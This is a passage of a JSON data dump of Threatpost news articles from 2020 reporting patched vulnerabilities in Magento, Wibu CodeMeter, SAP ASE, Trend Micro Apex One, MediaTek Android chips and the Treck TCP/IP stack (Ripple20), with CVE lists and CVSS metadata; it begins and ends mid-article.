data. These include a flaw that could allow unauthorized modification of Magento content management system (CMS) pages (CVE-2020-24404), one that could enable the unauthorized modification of an e-commerce business customer list (CVE-2020-24402) and two that could allow for unauthorized access to restricted resources (CVE-2020-24405 and CVE-2020-24403).\n\nAnother important vulnerability stems from an insufficient validation of a User Session, which could give an attacker unauthorized access to restricted resources (CVE-2020-24401).\n\nFor all of the flaws above, an attacker would need to have administrative privileges, but wouldn\u2019t need pre-authentication to exploit the flaw, according to Adobe.\n\nFinally, an important-severity cross-site scripting flaw (CVE-2020-24408) was also addressed, which could allow for arbitrary JavaScript execution in the browser. To exploit this, an attacker wouldn\u2019t need administrative privileges, but they would need credentials.\n\nSpecifically affected are Magento Commerce, versions 2.3.5-p1 and earlier and 2.4.0 and earlier; as well as Magento Open Source, versions 2.3.5-p1 and earlier and 2.4.0 and earlier. Adobe has issued patches (below) in Magento Commerce and Magento Open Source versions 2.4.1 and 2.3.6, and \u201crecommends users update their installation to the newest version.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/10/15154827/magento.png>)\n\nThe update for all vulnerabilities is a priority 2, meaning they exist in a product that has historically been at elevated risk \u2013 but for which there are currently no known exploits.\n\n\u201cBased on previous experience, we do not anticipate exploits are imminent. As a best practice, Adobe recommends administrators install the update soon (for example, within 30 days),\u201d according to the firm.\n\nIndeed, Magento has had its share of security flaws over the past year. In July, [Adobe fixed two critical vulnerabilities and two important-severity flaws](<https://threatpost.com/critical-magento-flaws-code-execution/157840/>) that could have enabled code execution and a signature-verification bypass. And in April, Adobe [patched several critical flaws](<https://helpx.adobe.com/security/products/magento/apsb20-22.html>) in Magento, which if exploited could lead to arbitrary code execution or information disclosure.\n\nThe issue also comes after [Magento 1 reached end-of-life (EOL) in June,](<https://threatpost.com/tuesdays-magento-1-eol-100k-online-stores/157000/>) with Adobe making a last-ditch effort to urge the 100,000 online stores still running the outdated version to migrate to Magento 2. E-commerce merchants must [migrate to Magento 2](<https://magento.com/blog/magento-news/support-magento-1-software-ends-june-30-2020>), which was released five years ago.\n", "cvss3": {}, "published": "2020-10-15T20:59:30", "type": "threatpost", "title": "Critical Magento Holes Open Online Shops to Code Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24401", "CVE-2020-24402", "CVE-2020-24403", "CVE-2020-24404", "CVE-2020-24405", "CVE-2020-24407", "CVE-2020-24408"], "modified": "2020-10-15T20:59:30", "id": "THREATPOST:785BBBEDA09A3CE4F8ACBCFA48B51AD2", "href": "https://threatpost.com/critical-magento-holes-online-shops-code-execution/160181/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:25:25", "description": "Critical vulnerabilities in Adobe\u2019s Magento e-commerce platform \u2013 a favorite target of the [Magecart cybergang](<https://threatpost.com/magecart-blue-bear-attack/151585/>) \u2013 could lead to arbitrary code execution.\n\nAdobe issued patches on Tuesday as part of its overall release of the [Magento 2.3.4 upgrade](<https://magento.com/blog/magento-news/magento-2.3.4-building-more-engaging-customer-experiences>), giving the fixes a \u201cpriority 2\u201d rating. In [Adobe parlance](<https://helpx.adobe.com/security/severity-ratings.html>), priority 2 means that administrators should apply the updates within 30 days.\n\nOut of the flaws, Adobe [has fixed](<https://helpx.adobe.com/security/products/magento/apsb20-02.html>) three that it rates as critical in severity, meaning that successful exploits could \u201callow malicious native code to execute, potentially without a user being aware.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nTwo of these could allow arbitrary code execution: CVE-2020-3716 is a deserialization of untrusted data flaw; and CVE-2020-3718 is a security bypass issue.\n\nThe bug tracked as CVE-2020-3719 meanwhile would allow SQL injection if successfully exploited. [SQL injection attacks](<https://owasp.org/www-project-cheat-sheets/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html>) occur when a website developer doesn\u2019t sanitize user-supplied data, which can lead to arbitrary reading and writing of data used within a web application. An attacker can take advantage by sending a malicious search query in the search box of a website.\n\nAdobe also patched a handful of bugs that it rates \u201cimportant\u201d in severity \u2013 [defined as](<https://helpx.adobe.com/security/severity-ratings.html>) issues that could allow \u201caccess to confidential data, or could compromise processing resources in a user\u2019s computer.\u201d\n\nThese include CVE-2020-3715 and CVE-2020-3758, stored cross-site scripting (XSS) flaws that could allow sensitive information disclosure. XSS bugs are [a type of injection](<https://owasp.org/www-community/attacks/xss/>), in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. If the browser doesn\u2019t validate the script and executes it, the script can access cookies, session tokens or other sensitive information retained by the browser.\n\nMeanwhile, the flaw tracked as CVE-2020-3717 is a path-traversal vulnerability that also could lead to sensitive information disclosure.\n\n## The Magecart Connection\n\nThe updates are likely of interest to Magecart groups, who will look to exploit the flaws ahead of administrators applying the patches. Magecart is an umbrella term encompassing several different threat groups who typically use the same modus operandi. They compromise websites by exploiting vulnerabilities in third-party e-commerce platforms, in order to inject card-skimming scripts on checkout pages. Magento is one of Magecart\u2019s most-targeted platforms.\n\nSQL injection bugs for instance have been successfully used by Magecart groups in their efforts before. An attack last year against Magento 2 (mounted within 16 hours of the flaw being disclosed) [exploited an SQL injection bug](<https://sansec.io/labs/2019/05/10/magento-2-hacks/>) to steal administrative console credentials by dumping the contents of the admin_user database table. These credentials were then used to log into the Magento dashboard and add the Magecart malware to the targeted website.\n\nCross-Site Scripting (XSS) flaws are another common attack vector against websites. Magecart [used a form of XSS](<https://www.thesslstore.com/blog/magecart-newegg-breach/>) attacks during [the Newegg breach](<https://threatpost.com/magecart-strikes-again-siphoning-payment-info-from-newegg/137576/>), for example.\n\n\u201cMagecart is a simple bit of code that is sophisticatedly injected into websites to steal credit-card information and most of the time unknowing to the website organization,\u201d said James McQuiggan, security awareness advocate at KnowBe4, via email. \u201cIt is important for organizations that use e-commerce websites with third-party connections or plugins to verify that they are up to date with all known patches and software. Organizations will want to restrict third-party vendors\u2019 access to sensitive data, like credit-card data, names and home address. Having a robust third-party policy to restrict external access to sensitive information and only allowing verified code or scripts to be executed can greatly reduce exposure.\u201d\n\nThe versions impacted by the latest slew of bugs are Magento Commerce and Open Source, 2.2.10 and earlier versions and 2.3.3 and earlier versions; Magento Enterprise Edition 1.14.4.3 and earlier versions; and Magento Community Edition, 1.9.4.3 and earlier versions. Users should update to version 2.3.4 to address the problems.\n\nAdobe gave white-hats Ernesto Martin, Blaklis, Luke Rodgers and Djordje Marjanovic credit for the various bugs\u2019 discovery.\n", "cvss3": {}, "published": "2020-01-29T15:27:13", "type": "threatpost", "title": "Critical Flaws in Magento e-Commerce Platform Allow Code-Execution", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3715", "CVE-2020-3716", "CVE-2020-3717", "CVE-2020-3718", "CVE-2020-3719", "CVE-2020-3758"], "modified": "2020-01-29T15:27:13", "id": "THREATPOST:F601825CA049E15E130F5026708E5DC5", "href": "https://threatpost.com/critical-flaws-magento-ecommerce-code-execution/152343/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-17T22:14:25", "description": "Six critical vulnerabilities have been discovered in a third-party software component powering various industrial systems. Remote, unauthenticated attackers can exploit the flaws to launch various malicious attacks \u2013 including deploying ransomware, and shutting down or even taking over critical systems.\n\nThe flaws exists in CodeMeter, owned by Wibu-Systems, which is a [software management component](<https://www.wibu.com/us/products/codemeter.html>) that\u2019s licensed by many of the top industrial control system (ICS) software vendors, including Rockwell Automation and Siemens. CodeMeter gives these companies tools to bolster security, help with licensing models, and protect against piracy or reverse-engineering.\n\nWibu-Systems made patches available for all of the flaws in version 7.10 of CodeMeter, on Aug. 11; however, the flaws were only recently disclosed by researchers on Tuesday. Many of the affected vendors have been notified and added \u2013 or are in the process of adding \u2013 fixes to their installers, said researchers with Claroty who discovered the glitches.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\n\u201cSuccessful exploitation of these vulnerabilities could allow an attacker to alter and forge a license file, cause a denial-of-service condition, potentially attain remote code-execution, read heap data and prevent normal operation of third-party software dependent on the CodeMeter,\u201d according to a [Tuesday advisory](<https://us-cert.cisa.gov/ics/advisories/icsa-20-203-01>) published by ICS-CERT.\n\nResearchers discovered a set of flaws in the CodeMeter WebSocket API ([CVE-2020-14519](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14519>)) enabling management of licenses via JavaScript. To exploit the flaws, an attacker would first have to phish or socially-engineer victims to lure them to a site they control.\n\nIn one attack scenario, an attacker could target a specific group of engineers looking for advice on a forum dedicated to programmable logic controllers (PLCs), by hosting the malicious payload on a phony or compromised forum. Once the target visits the attacker-controlled website, the threat actors are able to use JavaScript to inject a malicious license of their own onto the target\u2019s machine, researchers said.\n\n\u201cThese flaws can be exploited via phishing campaigns or directly by attackers who would be able to fingerprint user environments in order to modify existing software licenses or inject malicious ones, causing devices and processes to crash,\u201d according to Sharon Brizinov and Tal Keren, security researchers with Claroty, [in a Tuesday analysis](<https://www.claroty.com/2020/09/08/blog-research-wibu-codemeter-vulnerabilities/>). \u201cSerious encryption implementation issues, also discovered by Claroty, can be exploited to allow attackers to execute code remotely, and move laterally on [operational technology] (OT) networks.\u201d\n\nAnother severe flaw ([CVE-2020-14509](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14509>)) is a simple buffer-access error, in the packet parser mechanism used by CodeMeter, which does not verify length fields. This flaw has the highest CVSS v3 score possible (10 out of 10), making it critical.\n\n\u201cCVE-2020-14509 is a highly critical vulnerability that poses a great risk to products that are using the third-party component, CodeMeter,\u201d Brizinov told Threatpost. \u201cThe vulnerability is a heap buffer overflow memory-corruption flaw, and it could be exploited to gain remote code execution without any prior knowledge of the target machine. All an attacker will need to do is be able to communicate with the target machine via TCP port 22350.\u201d\n\nAnother serious bug ([CVE-2020-14517](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14517>)) was found in the CodeMeter encryption implementation. This flaw could be leveraged to attack the CodeMeter communication protocol and internal API, in order to remotely communicate with, and send commands to, any machine running CodeMeter, researchers said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/09102755/wibu-blog-image-1.png>)\n\nA breakdown of the CodeMeter WebSocket vulnerability (click to enlarge). Credit: Claroty\n\nThe remaining three flaws include an improper input-validation error ([CVE-2020-14513](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14513>)) that could force CodeMeter to shut down; an issue in the license-file signature-checking mechanism ([CVE-2020-14515](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14515>)) that allows attackers to build arbitrary license files; and an improper-resource shutdown or release vulnerability ([CVE-2020-16233](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-16233>)).\n\n\u201cChaining these\u2026 bugs allows an attacker to sign their own licenses and then inject them remotely,\u201d said researchers. \u201cVulnerabilities related to input-validation errors (CVE-2020-14513) could also be exploited to cause industrial gear to crash and be unresponsive, leading to a denial-of-service condition.\u201d\n\nAccording to ICS-CERT, Wibu-Systems recommends that users update to the latest version of the CodeMeter Runtime (version 7.10). Affected vendors like [Rockwell](<https://idp.rockwellautomation.com/adfs/ls/idpinitiatedsignon.aspx?RelayState=RPID%3Drockwellautomation.custhelp.com%26RelayState%3Danswers%2Fanswer_view%2Fa_id%2F1127863>) and [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>) have released their own security advisories, but researchers warn that, due to CodeMeter being integrated into many leading ICS products, users may be unaware this vulnerable third-party component is running in their environment.\n\n\u201cCodeMeter is a widely deployed third-party tool that is integrated into numerous products; organizations may not be aware their product has CodeMeter embedded, for example, or may not have a readily available update mechanism,\u201d warned researchers.\n\nBrizinov told Threatpost, researchers have not encountered any active campaigns using these exploits yet. Threatpost has reached out to Wibu-Systems for further comment.\n\nVulnerabilities in industrial gear has worried the security space due to the dire implications if a critical system is attacked. In July, the U.S. National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://threatpost.com/nsa-urgent-warning-industrial-cyberattacks-triconex/157723/>) warning that adversaries could be targeting critical infrastructure across the U.S.\n\nIn March, [security vulnerabilities](<https://threatpost.com/critical-bugs-in-rockwell-johnson-controls-ics-gear/153602/>) requiring very little skill to exploit were discovered in ICS devices from Rockwell Automation and Johnson Controls. And in July, researchers warned that [remote code-execution flaws](<https://threatpost.com/critical-bugs-utilities-vpns-physical-damage/157835/>) in virtual private network (VPN) products could impact the physical functioning of critical infrastructure in the oil and gas, water and electric utilities space.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-09T15:58:16", "type": "threatpost", "title": "Critical Flaws in 3rd-Party Code Allow Takeover of Industrial Control Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-14509", "CVE-2020-14513", "CVE-2020-14515", "CVE-2020-14517", "CVE-2020-14519", "CVE-2020-16233", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-09T15:58:16", "id": "THREATPOST:2599160F787BE161604E8BC2847A6643", "href": "https://threatpost.com/severe-industrial-bugs-takeover-critical-systems/159068/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:18:58", "description": "Researchers are urging users to apply patches for several critical vulnerabilities in SAP\u2019s Adaptive Server Enterprise (ASE). If exploited, the most severe flaws could give unprivileged users complete control of databases and \u2013 in some cases \u2013 even underlying operating systems.\n\nASE (previously known as Sybase SQL server) is SAP\u2019s popular database management software, targeted for transactional-based applications. ASE is used by more than 30,000 organizations globally \u2013 including 90 percent of the top banks and security firms worldwide, [according to SAP. ](<https://news.sap.com/2019/11/sap-ase-sap-iq-next-generation/>)\n\nResearchers disclosed six vulnerabilities that they discovered while conducting security tests for the latest version of the software, ASE 16 (SP03 PL08). While SAP has released patches for both [ASE 15.7 and 16.0 in its May 2020 update,](<https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=545396222>) researchers disclosed technical details of the flaws on Wednesday, saying \u201cthere is no question\u201d that the patches should be applied immediately if they haven\u2019t been already.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cFor the last several years there have been relatively few security patches for SAP Adaptive Server Enterprise (ASE),\u201d said Trustwave researchers [in a Wednesday analysis](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/system-takeover-through-new-sap-ase-vulnerabilities/>). \u201cNew security research conducted by Trustwave revealed a bunch of vulnerabilities in the current version of SAP\u2019s flagship relational database product. Historically, SAP ASE is widely used by the financial sector in the US and other countries.\u201d\n\nThe most severe vulnerability, [CVE-2020-6248](<https://www.google.com/search?client=safari&rls=en&q=CVE-2020-6248&ie=UTF-8&oe=UTF-8>), has a CVSS score of 9.1 out of 10. The flaw stems from a lack of security checks for overwriting critical configuration files during database backup operations. That means any unprivileged user who can run a DUMP command (used by database owners to back up the file system to storage devices) can send a corrupted configuration file, resulting in potential takeover of the database. This file will then be detected by the server and replaced with a default configuration \u2013 which allows anyone to connect to the Backup Server using the login and an empty password.\n\n\u201cThe next step would be to change the sybmultbuf_binary Backup Server setting to point to an executable of the attacker\u2019s choice,\u201d said researchers. \u201cSubsequent DUMP commands will now trigger the execution of the attacker\u2019s executable. If SAP ASE is running on Windows, the code will run as LocalSystem by default.\u201d\n\nAnother critical flaw ([CVE-2020-6252](<https://nvd.nist.gov/vuln/detail/CVE-2020-6252>)) was discovered affecting Windows installations of the SAP ASE 16. That bug exists in a small helper database (SQL Anywhere) used by the SAP ASE installation to manage database creation and version management. Specifically, the issue is in the Cockpit component of ASE, which is a web-based tool for monitoring the status and availability of SAP ASE servers. The issues stems from the password, used to login in to the helper database, being in a configuration file that is readable by any Windows user.\n\n\u201cThis means any valid Windows user can grab the file and recover the password to login to the helper SQL Anywhere database as the special user utility_db and then issue commands like CREATE ENCRYPTED FILE to overwrite operating system files (remember, the helper database runs as LocalSystem by default!) and possibly cause code execution with LocalSystem privileges,\u201d said researchers.\n\nIn another issue, researchers found clear text passwords in the ASE server installation logs: \u201cThe logs are only readable to the SAP account, but will completely compromise the SAP ASE when joined with some other issue that allows filesystem access,\u201d they said.\n\nResearchers also found two SQL injection flaws that could be abused to allow privilege escalation. One ([CVE-2020-6241](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6241>)) exists in global temporary tables in ASE 16, while the other ([CVE-2020-6253](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6253>)) stems from the WebServices handling code of ASE.\n\nThe final bug discovered was an XP Server flaw ([CVE-2020-6243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6243>)) that could allow authenticated Windows users to gain arbitrary code execution (as LocalSystem) if they can connect to the SAP ASE.\n\n\u201cOrganizations often store their most critical data in databases, which, in turn, are often necessarily exposed in untrusted or publicly exposed environments,\u201d said researchers. \u201cThis makes vulnerabilities like these essential to address and test quickly since they not only threaten the data in the database but potentially the full host that it is running on.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-03T16:51:39", "type": "threatpost", "title": "Critical SAP ASE Flaws Allow Complete Control of Databases", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135", "CVE-2020-6241", "CVE-2020-6243", "CVE-2020-6248", "CVE-2020-6252", "CVE-2020-6253"], "modified": "2020-06-03T16:51:39", "id": "THREATPOST:60965118E4D29480FABA6D1722EFA4AA", "href": "https://threatpost.com/critical-sap-ase-flaws-complete-control-databases/156239/", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-17T23:04:01", "description": "Trend Micro has released security updates patching five vulnerabilities in its endpoint security solutions, Apex One and OfficeScan XG for Windows.\n\nSpecifically, Apex One 2019 and OfficeScan XG SP1 and XG are affected by four critical-severity (and one high-severity) flaws. Two of these vulnerabilities are under active attack.\n\n\u201cTrend Micro has observed active attempts of potential attacks against \u2026 these vulnerabilities in the wild,\u201d the company said in its [Monday alert](<https://success.trendmicro.com/solution/000245571>). \u201cCustomers are strongly encouraged to update to the latest versions as soon as possible.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe first of two flaws under attack is a critical vulnerability (CVE-2020-8467) that exists in the migration tool component of Apex One and OfficeScan. The flaw could allow remote code execution on affected installations. While attackers could be remote, an attempted attack for this flaw requires authentication.\n\nThe second flaw actively targeted is a high-severity bug (CVE-2020-8468) in Apex One and OfficeScan. According to the advisory, impacted are the software\u2019s agents that are \u201caffected by a content validation escape vulnerability which could allow an attacker to manipulate certain agent client components. An attempted attack requires user authentication.\u201d\n\n**Critical Flaws**\n\nThe advisory also pointed to three additional critical flaws. While attempted exploits in the wild have not been observed at this time for these flaws, they all rank 10 (out of 10) on the CVSS scale, indicating the highest level of severity.\n\nThe first (CVE-2020-8470) stems from the Apex One and OfficeScan server containing a vulnerable service DLL file, which could enable an unauthenticated attacker to delete any file on the server with SYSTEM level privileges.\n\nAnother (CVE-2020-8599) exists due to the server containing a vulnerable EXE file, which could allow a remote, unauthenticated attacker to write arbitrary data to an arbitrary path on affected installations and bypass ROOT login.\n\nAnd the final flaw (CVE-2020-8598) is due to the server containing a vulnerable service DLL file that could allow an unauthenticated, remote attacker to execute arbitrary code on affected installations with SYSTEM level privileges.\n\nThe advisory stressed that exploiting these vulnerabilities generally requires that an attacker has access (physical or remote) to a vulnerable machine. So beyond updating to the latest fixed versions (which are listed below), users \u201care encouraged to review and ensure the product servers and management consoles are restricted to trusted networks and/or users as appropriate.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/03/18115224/security-patch.png>)\n\nTrend Micro discovered all vulnerabilities in question.\n\nResearchers with Tenable noted in an analysis posted Tuesday, this isn\u2019t the first time attackers have singled out Trend Micro. \u201cIn October 2019, Trend Micro published a security bulletin for CVE-2019-18187, a directory traversal vulnerability in OfficeScan. According to their bulletin, they had observed active attempts to exploit the flaw in the wild,\u201d they [said.](<https://www.tenable.com/blog/cve-2020-8467-cve-2020-8468-vulnerabilities-in-trend-micro-apex-one-and-officescan-exploited-in>) \u201cCustomers running these products should be aware that attackers will continue to exploit these vulnerabilities and search for other, undiscovered vulnerabilities in these products.\u201d\n\n**_Interested in security for the Internet of Things and how 5G will change things? Join our free Threatpost webinar, _**[**_\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d_**](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)**_ as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. _**[**_Register here_**](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)**_._**\n", "cvss3": {}, "published": "2020-03-18T18:00:39", "type": "threatpost", "title": "Trend Micro Fixes Critical Flaws Under Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18187", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8470", "CVE-2020-8598", "CVE-2020-8599"], "modified": "2020-03-18T18:00:39", "id": "THREATPOST:FE1BBBDAB06CCA2534A051537BC5CC73", "href": "https://threatpost.com/trend-micro-fixes-critical-flaws-under-attack/153911/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:23:26", "description": "Google has addressed a high-severity flaw in MediaTek\u2019s Command Queue driver that developers said affects millions of devices \u2013 and which has an exploit already circulating in the wild.\n\nAlso in its March 2020 Android Security bulletin, [issued this week](<https://source.android.com/security/bulletin/2020-03-01>), Google disclosed and patched a critical security vulnerability in the Android media framework, which could enable remote code execution within the context of a privileged process.\n\nThe critical bug (CVE-2020-0032) can be exploited with a specially crafted file, according to the advisory. Other details were scant, but Google noted that it\u2019s the most concerning vulnerability out of the entirety of the March update.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe MediaTek bug meanwhile is an elevation-of-privilege flaw (CVE-2020-0069) discovered by members of XDA-Developers (a forum for Android software modifications) \u2014 they said the bug is more specifically a root-access issue. Even though the March update is the bug\u2019s first public disclosure, XDA members said [in a posting this week](<https://www.xda-developers.com/mediatek-su-rootkit-exploit/>) that an exploit for it has been floating around since April last year. And, they said that it is now being actively used by cybercriminals in campaigns.\n\n\u201cDespite MediaTek making a patch available a month after discovery, the vulnerability is still exploitable on dozens of device models,\u201d according to the alert. \u201cNow MediaTek has turned to Google to close this patch gap and secure millions of devices against this critical security exploit.\u201d\n\nAn XDA community member who goes by \u201cdiplomatic\u201d was looking to gain root access to Amazon Fire tablets, which runs on the Android OS, in order to get rid of what developers said is \u201cuninstallable bloatware\u201d on the devices. Amazon has locked the environment down to keep users within its walled garden, according to the developers.\n\n\u201cThe only way to root an Amazon Fire tablet (without hardware modifications) is to find an exploit in the software that allows the user to bypass Android\u2019s security model,\u201d according to the post. \u201cIn February of 2019, that\u2019s exactly what XDA Senior Member diplomatic did when he published a thread on our Amazon Fire tablet forums. He quickly realized that this exploit was far wider in scope than just Amazon\u2019s Fire tablets.\u201d\n\nIn fact, the exploit works on \u201cvirtually all of MediaTek\u2019s 64-bit chips,\u201d developers said, translating to millions of devices.\n\ndiplomatic\u2019s exploit is a script, dubbed \u201cMediaTek-su\u201d that grants users superuser access in shell. It also sets SELinux (the Linux kernel module that provides access control for processes), to the \u201chighly insecure \u201cpermissive\u201d state,\u201d according to the post.\n\n\u201cFor a user to get root access and set SELinux to permissive on their own device is shockingly easy to do: All you have to do is copy the script to a temporary folder, change directories to where the script is stored, add executable permissions to the script, and then execute the script,\u201d XDA members explained.\n\nAfter discovering the script and how dangerous it can be in February, the forum notified Google of the bug, members said. XDA noted that in January, Trend Micro [found three malicious spyware apps](<https://blog.trendmicro.com/trendlabs-security-intelligence/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group/>) in the Google Play Store, linked to the APT known as SideWinder. The analysis mentions in passing that the apps were using MediaTek-su to gain root access on Pixel devices \u2013 though XDA pointed out that researchers there likely didn\u2019t realize that MediaTek-su was an unpatched exploit and didn\u2019t think to notify vendors.\n\nThe consequences of a successful attack can be significant: With root access, any app can grant itself any permission it wants; and with a root shell, all files on the device, even those stored in private data directories of applications, are accessible.\n\n\u201cAn app with root can also silently install any other app it wants in the background and then grant them whatever permissions they need to violate your privacy,\u201d according to XDA members. \u201cAccording to XDA Recognized Developer topjohnwu, a malicious app can even \u2018inject code directly into Zygote by using ptrace,\u2019 which means a normal app on your device could be hijacked to do the bidding of the attacker.\u201d\n\nAlso in its March Android update, Google also patched a slew of other high-severity bugs and a handful of moderate flaws, across various components. In the media framework, Google addressed a high-severity elevation-of-privilege bug (CVE-2020-0033) and a high-severity information-disclosure issue (CVE-2020-0034) for instance. Other components with patches include the Android system, the Android framework, the Google Play system, the kernel and flexible printed circuits (FPC). It also issued advisories for high-severity bugs in third-party components, including from Qualcomm and the aforementioned MediaTek bug.\n\nAndroid partners and OEMs were notified of the issues at least a month before publication of the March update in order to give them time to issue patches, as [Samsung has done](<https://security.samsungmobile.com/securityUpdate.smsb>) as well as [Qualcomm](<https://www.qualcomm.com/company/product-security/bulletins/march-2020-bulletin>). Source code patches for the issues were also released to the Android Open Source Project (AOSP) repository, according to the advisory.While the patch is now available, XDA members pointed out that MediaTek chipsets are found in dozens of budget and mid-tier Android devices from many different vendors, so the patching process is likely to take a while.\n", "cvss3": {}, "published": "2020-03-03T19:02:22", "type": "threatpost", "title": "MediaTek Bug Actively Exploited, Affects Millions of Android Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-2215", "CVE-2020-0032", "CVE-2020-0033", "CVE-2020-0034", "CVE-2020-0069", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-03-03T19:02:22", "id": "THREATPOST:C7B22E2E8B3AB6D2FD4DA4F6C33951CF", "href": "https://threatpost.com/mediatek-bug-actively-exploited-android/153408/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:18:16", "description": "A series of 19 different vulnerabilities, four of them critical, are affecting hundreds of millions of internet of things (IoT) and industrial-control devices.\n\nThe issue is based in the supply chain and code reuse, with the bugs affecting a TCP/IP software library developed by Treck that many manufacturers use. Researchers at JSOF uncovered the faulty part of Treck\u2019s code, which is built to handle the ubiquitous TCP-IP protocol that connects devices to networks and the internet, in the devices of more than 10 different manufacturers\u2014and it\u2019s likely present in dozens more.\n\nAffected hardware includes everything from connected printers to medical infusion pumps and industrial-control gear, according to researchers at JSOF\u2019s research lab. Treck users include \u201cone-person boutique shops to Fortune 500 multinational corporations, including HP, Schneider Electric, Intel, Rockwell Automation, Caterpillar, Baxter, as well as many other major international vendors suspected of being of vulnerable in medical, transportation, industrial control, enterprise, energy (oil/gas), telecom, retail and commerce, and other industries,\u201d according to the research.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe wide-spread dissemination of the software library (and its internal vulnerabilities) was a natural consequence of the supply chain \u2018ripple-effect,'\u201d researchers said [in a posting](<https://www.jsof-tech.com/ripple20/#ripple-whitepaper>) on Tuesday. \u201cA single vulnerable component, though it may be relatively small in and of itself, can ripple outward to impact a wide range of industries, applications, companies and people.\u201d\n\nThe flaws, dubbed Ripple20, include four remote code-execution vulnerabilities. If properly exploited, data could be stolen off of a printer, a medical device\u2019s behavior could be tampered with, or industrial control devices could be made to malfunction.\n\n\u201cAn attacker could hide malicious code within embedded devices for years. One of the vulnerabilities could enable entry from outside into the network boundaries; and this is only a small taste of the potential risks,\u201d according to JSOF.\n\n## **Vulnerability Details**\n\nThe Ripple20 bugs include four critical flaws. These include CVE-2020-11896, with a base score of 10 out of 10 on the CVSS severity scale, which can be triggered by sending multiple malformed IPv4 packets to a device supporting IPv4 tunneling.\n\n\u201cIt affects any device running Treck with a specific configuration,\u201d according to JSOF. \u201cIt can allow a stable remote code execution and has been demonstrated on a Digi International device. Variants of this issue can be triggered to cause a 